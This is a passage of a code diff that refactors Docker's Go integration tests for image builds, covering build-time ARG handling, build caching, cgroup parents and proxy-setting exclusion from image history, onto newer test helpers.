1, + }) } func (s *DockerSuite) TestBuildContainerWithCgroupParent(c *check.C) { - testRequires(c, SameHostDaemon) - testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon, DaemonIsLinux) cgroupParent := "test" data, err := ioutil.ReadFile("/proc/self/cgroup") if err != nil { c.Fatalf("failed to read '/proc/self/cgroup - %v", err) } - selfCgroupPaths := parseCgroupPaths(string(data)) + selfCgroupPaths := ParseCgroupPaths(string(data)) _, found := selfCgroupPaths["memory"] if !found { c.Fatalf("unable to find self memory cgroup path. CgroupsPath: %v", selfCgroupPaths) } - cmd := exec.Command(dockerBinary, "build", "--cgroup-parent", cgroupParent, "-") - cmd.Stdin = strings.NewReader(` + result := buildImage("buildcgroupparent", + cli.WithFlags("--cgroup-parent", cgroupParent), + build.WithDockerfile(` FROM busybox RUN cat /proc/self/cgroup -`) - - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) - } - m, err := regexp.MatchString(fmt.Sprintf("memory:.*/%s/.*", cgroupParent), out) +`)) + result.Assert(c, icmd.Success) + m, err := regexp.MatchString(fmt.Sprintf("memory:.*/%s/.*", cgroupParent), result.Combined()) c.Assert(err, check.IsNil) if !m { - c.Fatalf("There is no expected memory cgroup with parent /%s/: %s", cgroupParent, out) + c.Fatalf("There is no expected memory cgroup with parent /%s/: %s", cgroupParent, result.Combined()) } } +// FIXME(vdemeester) could be a unit test func (s *DockerSuite) TestBuildNoDupOutput(c *check.C) { // Check to make sure our build output prints the Dockerfile cmd // property - there was a bug that caused it to be duplicated on the // Step X line name := "testbuildnodupoutput" - - _, out, err := buildImageWithOut(name, ` + result := buildImage(name, build.WithDockerfile(` FROM busybox - RUN env`, false) - if err != nil { - c.Fatalf("Build should have worked: %q", err) - } - + RUN env`)) + result.Assert(c, icmd.Success) exp := "\nStep 2/2 : RUN env\n" - if !strings.Contains(out, exp) { - c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp) + if !strings.Contains(result.Combined(), exp) { + c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", result.Combined(), exp) } } // GH15826 +// FIXME(vdemeester) could be a unit test func (s *DockerSuite) TestBuildStartsFromOne(c *check.C) { // Explicit check to ensure that build starts from step 1 rather than 0 name := "testbuildstartsfromone" - - _, out, err := buildImageWithOut(name, ` - FROM busybox`, false) - if err != nil { - c.Fatalf("Build should have worked: %q", err) - } - + result := buildImage(name, build.WithDockerfile(`FROM busybox`)) + result.Assert(c, icmd.Success) exp := "\nStep 1/1 : FROM busybox\n" - if !strings.Contains(out, exp) { - c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp) + if !strings.Contains(result.Combined(), exp) { + c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", result.Combined(), exp) } } @@ -5403,228 +4031,49 @@ func (s *DockerSuite) TestBuildRUNErrMsg(c *check.C) { // Test to make sure the bad command is quoted with just "s and // not as a Go []string name := "testbuildbadrunerrmsg" - _, out, err := buildImageWithOut(name, ` - FROM busybox - RUN badEXE a1 \& a2 a3`, false) // tab between a2 and a3 - if err == nil { - c.Fatal("Should have failed to build") - } shell := "/bin/sh -c" - exitCode := "127" - if daemonPlatform == "windows" { + exitCode := 127 + if testEnv.OSType == "windows" { shell = "cmd /S /C" // architectural - Windows has to start the container to determine the exe is bad, Linux does not - exitCode = "1" - } - exp := `The command '` + shell + ` badEXE a1 \& a2 a3' returned a non-zero code: ` + exitCode - if !strings.Contains(out, exp) { - c.Fatalf("RUN doesn't have the correct output:\nGot:%s\nExpected:%s", out, exp) - } -} - -func (s *DockerTrustSuite) TestTrustedBuild(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-build") - dockerFile := fmt.Sprintf(` - FROM %s - RUN [] - `, repoName) - - name := "testtrustedbuild" - - buildCmd := buildImageCmd(name, dockerFile, true) - s.trustedCmd(buildCmd) - out, _, err := runCommandWithOutput(buildCmd) - if err != nil { - c.Fatalf("Error running trusted build: %s\n%s", err, out) - } - - if !strings.Contains(out, fmt.Sprintf("FROM %s@sha", repoName[:len(repoName)-7])) { - c.Fatalf("Unexpected output on trusted build:\n%s", out) - } - - // We should also have a tag reference for the image. - if out, exitCode := dockerCmd(c, "inspect", repoName); exitCode != 0 { - c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out) - } - - // We should now be able to remove the tag reference. - if out, exitCode := dockerCmd(c, "rmi", repoName); exitCode != 0 { - c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out) - } -} - -func (s *DockerTrustSuite) TestTrustedBuildUntrustedTag(c *check.C) { - repoName := fmt.Sprintf("%v/dockercli/build-untrusted-tag:latest", privateRegistryURL) - dockerFile := fmt.Sprintf(` - FROM %s - RUN [] - `, repoName) - - name := "testtrustedbuilduntrustedtag" - - buildCmd := buildImageCmd(name, dockerFile, true) - s.trustedCmd(buildCmd) - out, _, err := runCommandWithOutput(buildCmd) - if err == nil { - c.Fatalf("Expected error on trusted build with untrusted tag: %s\n%s", err, out) + exitCode = 1 } + exp := fmt.Sprintf(`The command '%s badEXE a1 \& a2 a3' returned a non-zero code: %d`, shell, exitCode) - if !strings.Contains(out, "does not have trust data for") { - c.Fatalf("Unexpected output on trusted build with untrusted tag:\n%s", out) - } -} - -func (s *DockerTrustSuite) TestBuildContextDirIsSymlink(c *check.C) { - testRequires(c, DaemonIsLinux) - tempDir, err := ioutil.TempDir("", "test-build-dir-is-symlink-") - c.Assert(err, check.IsNil) - defer os.RemoveAll(tempDir) - - // Make a real context directory in this temp directory with a simple - // Dockerfile. - realContextDirname := filepath.Join(tempDir, "context") - if err := os.Mkdir(realContextDirname, os.FileMode(0755)); err != nil { - c.Fatal(err) - } - - if err = ioutil.WriteFile( - filepath.Join(realContextDirname, "Dockerfile"), - []byte(` - FROM busybox - RUN echo hello world - `), - os.FileMode(0644), - ); err != nil { - c.Fatal(err) - } - - // Make a symlink to the real context directory. - contextSymlinkName := filepath.Join(tempDir, "context_link") - if err := os.Symlink(realContextDirname, contextSymlinkName); err != nil { - c.Fatal(err) - } - - // Executing the build with the symlink as the specified context should - // *not* fail. - if out, exitStatus := dockerCmd(c, "build", contextSymlinkName); exitStatus != 0 { - c.Fatalf("build failed with exit status %d: %s", exitStatus, out) - } -} - -func (s *DockerTrustSuite) TestTrustedBuildTagFromReleasesRole(c *check.C) { - testRequires(c, NotaryHosting) - - latestTag := s.setupTrustedImage(c, "trusted-build-releases-role") - repoName := strings.TrimSuffix(latestTag, ":latest") - - // Now create the releases role - s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) - s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) - s.notaryPublish(c, repoName) - - // push a different tag to the releases role - otherTag := fmt.Sprintf("%s:other", repoName) - dockerCmd(c, "tag", "busybox", otherTag) - - pushCmd := exec.Command(dockerBinary, "push", otherTag) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out)) - s.assertTargetInRoles(c, repoName, "other", "targets/releases") - s.assertTargetNotInRoles(c, repoName, "other", "targets") - - out, status := dockerCmd(c, "rmi", otherTag) - c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out)) - - dockerFile := fmt.Sprintf(` - FROM %s - RUN [] - `, otherTag) - - name := "testtrustedbuildreleasesrole" - - buildCmd := buildImageCmd(name, dockerFile, true) - s.trustedCmd(buildCmd) - out, _, err = runCommandWithOutput(buildCmd) - c.Assert(err, check.IsNil, check.Commentf("Trusted build failed: %s", out)) - c.Assert(out, checker.Contains, fmt.Sprintf("FROM %s@sha", repoName)) -} - -func (s *DockerTrustSuite) TestTrustedBuildTagIgnoresOtherDelegationRoles(c *check.C) { - testRequires(c, NotaryHosting) - - latestTag := s.setupTrustedImage(c, "trusted-build-releases-role") - repoName := strings.TrimSuffix(latestTag, ":latest") - - // Now create a non-releases delegation role - s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public) - s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private) - s.notaryPublish(c, repoName) - - // push a different tag to the other role - otherTag := fmt.Sprintf("%s:other", repoName) - dockerCmd(c, "tag", "busybox", otherTag) - - pushCmd := exec.Command(dockerBinary, "push", otherTag) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out)) - s.assertTargetInRoles(c, repoName, "other", "targets/other") - s.assertTargetNotInRoles(c, repoName, "other", "targets") - - out, status := dockerCmd(c, "rmi", otherTag) - c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out)) - - dockerFile := fmt.Sprintf(` - FROM %s - RUN [] - `, otherTag) - - name := "testtrustedbuildotherrole" - - buildCmd := buildImageCmd(name, dockerFile, true) - s.trustedCmd(buildCmd) - out, _, err = runCommandWithOutput(buildCmd) - c.Assert(err, check.NotNil, check.Commentf("Trusted build expected to fail: %s", out)) + buildImage(name, build.WithDockerfile(` + FROM busybox + RUN badEXE a1 \& a2 a3`)).Assert(c, icmd.Expected{ + ExitCode: exitCode, + Err: exp, + }) } // Issue #15634: COPY fails when path starts with "null" func (s *DockerSuite) TestBuildNullStringInAddCopyVolume(c *check.C) { name := "testbuildnullstringinaddcopyvolume" - volName := "nullvolume" - - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volName = `C:\\nullvolume` } - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox ADD null / COPY nullfile / VOLUME `+volName+` - `, - map[string]string{ - "null": "test1", - "nullfile": "test2", - }, - ) - c.Assert(err, check.IsNil) - defer ctx.Close() - - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, check.IsNil) + `), + build.WithFile("null", "test1"), + build.WithFile("nullfile", "test2"), + )) } func (s *DockerSuite) TestBuildStopSignal(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support STOPSIGNAL yet imgName := "test_build_stop_signal" - _, err := buildImage(imgName, - `FROM busybox - STOPSIGNAL SIGKILL`, - true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imgName, build.WithDockerfile(`FROM busybox + STOPSIGNAL SIGKILL`)) res := inspectFieldJSON(c, imgName, "Config.StopSignal") if res != `"SIGKILL"` { c.Fatalf("Signal %s, expected SIGKILL", res) @@ -5632,7 +4081,6 @@ func (s *DockerSuite) TestBuildStopSignal(c *check.C) { containerName := "test-container-stop-signal" dockerCmd(c, "run", "-d", "--name", containerName, imgName, "top") - res = inspectFieldJSON(c, containerName, "Config.StopSignal") if res != `"SIGKILL"` { c.Fatalf("Signal %s, expected SIGKILL", res) @@ -5643,9 +4091,8 @@ func (s *DockerSuite) TestBuildBuildTimeArg(c *check.C) { imgName := "bldargtest" envKey := "foo" envVal := "bar" - args := []string{"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)} var dockerfile string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Bugs in Windows busybox port - use the default base image and native cmd stuff dockerfile = fmt.Sprintf(`FROM `+minimalBaseImage()+` ARG %s @@ -5658,13 +4105,12 @@ func (s *DockerSuite) TestBuildBuildTimeArg(c *check.C) { CMD echo $%s`, envKey, envKey, envKey) } - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) - } + buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ).Assert(c, icmd.Expected{ + Out: envVal, + }) containerName := "bldargCont" out, _ := dockerCmd(c, "run", "--name", containerName, imgName) @@ -5679,18 +4125,14 @@ func (s *DockerSuite) TestBuildBuildTimeArgHistory(c *check.C) { envKey := "foo" envVal := "bar" envDef := "bar1" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } dockerfile := fmt.Sprintf(`FROM busybox ARG %s=%s`, envKey, envDef) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) - } + buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ).Assert(c, icmd.Expected{ + Out: envVal, + }) out, _ := dockerCmd(c, "history", "--no-trunc", imgName) outputTabs := strings.Split(out, "\n")[1] @@ -5699,28 +4141,66 @@ func (s *DockerSuite) TestBuildBuildTimeArgHistory(c *check.C) { } } -func (s *DockerSuite) TestBuildBuildTimeArgCacheHit(c *check.C) { +func (s *DockerSuite) TestBuildTimeArgHistoryExclusions(c *check.C) { imgName := "bldargtest" envKey := "foo" envVal := "bar" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } + proxy := "HTTP_PROXY=http://user:password@proxy.example.com" + explicitProxyKey := "http_proxy" + explicitProxyVal := "http://user:password@someproxy.example.com" dockerfile := fmt.Sprintf(`FROM busybox ARG %s - RUN echo $%s`, envKey, envKey) + ARG %s + RUN echo "Testing Build Args!"`, envKey, explicitProxyKey) - origImgID := "" - var err error - if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { - c.Fatal(err) + buildImage := func(imgName string) string { + cli.BuildCmd(c, imgName, + cli.WithFlags("--build-arg", "https_proxy=https://proxy.example.com", + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + "--build-arg", fmt.Sprintf("%s=%s", explicitProxyKey, explicitProxyVal), + "--build-arg", proxy), + build.WithDockerfile(dockerfile), + ) + return getIDByName(c, imgName) + } + + origID := buildImage(imgName) + result := cli.DockerCmd(c, "history", "--no-trunc", imgName) + out := result.Stdout() + + if strings.Contains(out, proxy) { + c.Fatalf("failed to exclude proxy settings from history!") } + if strings.Contains(out, "https_proxy") { + c.Fatalf("failed to exclude proxy settings from history!") + } + result.Assert(c, icmd.Expected{Out: fmt.Sprintf("%s=%s", envKey, envVal)}) + result.Assert(c, icmd.Expected{Out: fmt.Sprintf("%s=%s", explicitProxyKey, explicitProxyVal)}) + + cacheID := buildImage(imgName + "-two") + c.Assert(origID, checker.Equals, cacheID) +} + +func (s *DockerSuite) TestBuildBuildTimeArgCacheHit(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + RUN echo $%s`, envKey, envKey) + buildImageSuccessfully(c, imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + origImgID := getIDByName(c, imgName) imgNameCache := "bldargtestcachehit" - if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID != origImgID { - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgNameCache, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + newImgID := getIDByName(c, imgName) + if newImgID != origImgID { c.Fatalf("build didn't use cache! expected image id: %q built image id: %q", origImgID, newImgID) } } @@ -5731,27 +4211,27 @@ func (s *DockerSuite) TestBuildBuildTimeArgCacheMissExtraArg(c *check.C) { envVal := "bar" extraEnvKey := "foo1" extraEnvVal := "bar1" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } - dockerfile := fmt.Sprintf(`FROM busybox ARG %s ARG %s RUN echo $%s`, envKey, extraEnvKey, envKey) - - origImgID := "" - var err error - if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + origImgID := getIDByName(c, imgName) imgNameCache := "bldargtestcachemiss" - args = append(args, "--build-arg", fmt.Sprintf("%s=%s", extraEnvKey, extraEnvVal)) - if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID { - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgNameCache, + cli.WithFlags( + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + "--build-arg", fmt.Sprintf("%s=%s", extraEnvKey, extraEnvVal), + ), + build.WithDockerfile(dockerfile), + ) + newImgID := getIDByName(c, imgNameCache) + + if newImgID == origImgID { c.Fatalf("build used cache, expected a miss!") } } @@ -5761,28 +4241,22 @@ func (s *DockerSuite) TestBuildBuildTimeArgCacheMissSameArgDiffVal(c *check.C) { envKey := "foo" envVal := "bar" newEnvVal := "bar1" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } - dockerfile := fmt.Sprintf(`FROM busybox ARG %s RUN echo $%s`, envKey, envKey) - - origImgID := "" - var err error - if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + origImgID := getIDByName(c, imgName) imgNameCache := "bldargtestcachemiss" - args = []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, newEnvVal), - } - if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID { - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgNameCache, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, newEnvVal)), + build.WithDockerfile(dockerfile), + ) + newImgID := getIDByName(c, imgNameCache) + if newImgID == origImgID { c.Fatalf("build used cache, expected a miss!") } } @@ -5792,61 +4266,58 @@ func (s *DockerSuite) TestBuildBuildTimeArgOverrideArgDefinedBeforeEnv(c *check. imgName := "bldargtest" envKey := "foo" envVal := "bar" - envValOveride := "barOverride" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } + envValOverride := "barOverride" dockerfile := fmt.Sprintf(`FROM busybox ARG %s ENV %s %s RUN echo $%s CMD echo $%s - `, envKey, envKey, envValOveride, envKey, envKey) + `, envKey, envKey, envValOverride, envKey, envKey) - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envValOverride) != 2 { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride) } containerName := "bldargCont" - if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { - c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride) } } +// FIXME(vdemeester) might be useful to merge with the one above ? func (s *DockerSuite) TestBuildBuildTimeArgOverrideEnvDefinedBeforeArg(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support ARG imgName := "bldargtest" envKey := "foo" envVal := "bar" - envValOveride := "barOverride" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } + envValOverride := "barOverride" dockerfile := fmt.Sprintf(`FROM busybox ENV %s %s ARG %s RUN echo $%s CMD echo $%s - `, envKey, envValOveride, envKey, envKey, envKey) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + `, envKey, envValOverride, envKey, envKey, envKey) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envValOverride) != 2 { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride) } containerName := "bldargCont" - if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { - c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride) } } func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { - testRequires(c, DaemonIsLinux) // Windows does not support ARG imgName := "bldvarstest" wdVar := "WDIR" @@ -5863,16 +4334,23 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { userVal := "testUser" volVar := "VOL" volVal := "/testVol/" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", wdVar, wdVal), - "--build-arg", fmt.Sprintf("%s=%s", addVar, addVal), - "--build-arg", fmt.Sprintf("%s=%s", copyVar, copyVal), - "--build-arg", fmt.Sprintf("%s=%s", envVar, envVal), - "--build-arg", fmt.Sprintf("%s=%s", exposeVar, exposeVal), - "--build-arg", fmt.Sprintf("%s=%s", userVar, userVal), - "--build-arg", fmt.Sprintf("%s=%s", volVar, volVal), - } - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + if DaemonIsWindows() { + volVal = "C:\\testVol" + wdVal = "C:\\tmp" + } + + buildImageSuccessfully(c, imgName, + cli.WithFlags( + "--build-arg", fmt.Sprintf("%s=%s", wdVar, wdVal), + "--build-arg", fmt.Sprintf("%s=%s", addVar, addVal), + "--build-arg", fmt.Sprintf("%s=%s", copyVar, copyVal), + "--build-arg", fmt.Sprintf("%s=%s", envVar, envVal), + "--build-arg", fmt.Sprintf("%s=%s", exposeVar, exposeVal), + "--build-arg", fmt.Sprintf("%s=%s", userVar, userVal), + "--build-arg", fmt.Sprintf("%s=%s", volVar, volVal), + ), + build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox ARG %s WORKDIR ${%s} ARG %s @@ -5887,30 +4365,18 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { USER $%s ARG %s VOLUME ${%s}`, - wdVar, wdVar, addVar, addVar, copyVar, copyVar, envVar, envVar, - envVar, exposeVar, exposeVar, userVar, userVar, volVar, volVar), - map[string]string{ - addVal: "some stuff", - copyVal: "some stuff", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() + wdVar, wdVar, addVar, addVar, copyVar, copyVar, envVar, envVar, + envVar, exposeVar, exposeVar, userVar, userVar, volVar, volVar)), + build.WithFile(addVal, "some stuff"), + build.WithFile(copyVal, "some stuff"), + ), + ) - if _, err := buildImageFromContext(imgName, ctx, true, args...); err != nil { - c.Fatal(err) - } + res := inspectField(c, imgName, "Config.WorkingDir") + c.Check(filepath.ToSlash(res), check.Equals, filepath.ToSlash(wdVal)) - var resMap map[string]interface{} var resArr []string - res := "" - res = inspectField(c, imgName, "Config.WorkingDir") - if res != filepath.ToSlash(filepath.Clean(wdVal)) { - c.Fatalf("Config.WorkingDir value mismatch. Expected: %s, got: %s", filepath.ToSlash(filepath.Clean(wdVal)), res) - } - - inspectFieldAndMarshall(c, imgName, "Config.Env", &resArr) + inspectFieldAndUnmarshall(c, imgName, "Config.Env", &resArr) found := false for _, v := range resArr { @@ -5924,7 +4390,8 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { envVar, envVal, resArr) } - inspectFieldAndMarshall(c, imgName, "Config.ExposedPorts", &resMap) + var resMap map[string]interface{} + inspectFieldAndUnmarshall(c, imgName, "Config.ExposedPorts", &resMap) if _, ok := resMap[fmt.Sprintf("%s/tcp", exposeVal)]; !ok { c.Fatalf("Config.ExposedPorts value mismatch. Expected exposed port: %s/tcp, got: %v", exposeVal, resMap) } @@ -5934,7 +4401,7 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { c.Fatalf("Config.User value mismatch. Expected: %s, got: %s", userVal, res) } - inspectFieldAndMarshall(c, imgName, "Config.Volumes", &resMap) + inspectFieldAndUnmarshall(c, imgName, "Config.Volumes", &resMap) if _, ok := resMap[volVal]; !ok { c.Fatalf("Config.Volumes value mismatch. Expected volume: %s, got: %v", volVal, resMap) } @@ -5946,27 +4413,25 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansionOverride(c *check.C) { envKey := "foo" envVal := "bar" envKey1 := "foo1" - envValOveride := "barOverride" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } + envValOverride := "barOverride" dockerfile := fmt.Sprintf(`FROM busybox ARG %s ENV %s %s ENV %s ${%s} RUN echo $%s - CMD echo $%s`, envKey, envKey, envValOveride, envKey1, envKey, envKey1, envKey1) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + CMD echo $%s`, envKey, envKey, envValOverride, envKey1, envKey, envKey1, envKey1) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envValOverride) != 2 { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride) } containerName := "bldargCont" - if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { - c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride) } } @@ -5975,19 +4440,17 @@ func (s *DockerSuite) TestBuildBuildTimeArgUntrustedDefinedAfterUse(c *check.C) imgName := "bldargtest" envKey := "foo" envVal := "bar" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } dockerfile := fmt.Sprintf(`FROM busybox RUN echo $%s ARG %s CMD echo $%s`, envKey, envKey, envKey) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Contains(out, envVal) { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("able to access environment variable in output: %q expected to be missing", out) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Contains(result.Combined(), envVal) { + c.Fatalf("able to access environment variable in output: %q expected to be missing", result.Combined()) } containerName := "bldargCont" @@ -6001,20 +4464,18 @@ func (s *DockerSuite) TestBuildBuildTimeArgBuiltinArg(c *check.C) { imgName := "bldargtest" envKey := "HTTP_PROXY" envVal := "bar" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } dockerfile := fmt.Sprintf(`FROM busybox RUN echo $%s CMD echo $%s`, envKey, envKey) - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if !strings.Contains(result.Combined(), envVal) { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envVal) } - containerName := "bldargCont" if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); out != "\n" { c.Fatalf("run produced invalid output: %q, expected empty string", out) @@ -6026,26 +4487,24 @@ func (s *DockerSuite) TestBuildBuildTimeArgDefaultOverride(c *check.C) { imgName := "bldargtest" envKey := "foo" envVal := "bar" - envValOveride := "barOverride" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envValOveride), - } + envValOverride := "barOverride" dockerfile := fmt.Sprintf(`FROM busybox ARG %s=%s ENV %s $%s RUN echo $%s CMD echo $%s`, envKey, envVal, envKey, envKey, envKey, envKey) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 1 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envValOverride)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envValOverride) != 1 { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride) } containerName := "bldargCont" - if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { - c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride) } } @@ -6053,46 +4512,28 @@ func (s *DockerSuite) TestBuildBuildTimeArgUnconsumedArg(c *check.C) { imgName := "bldargtest" envKey := "foo" 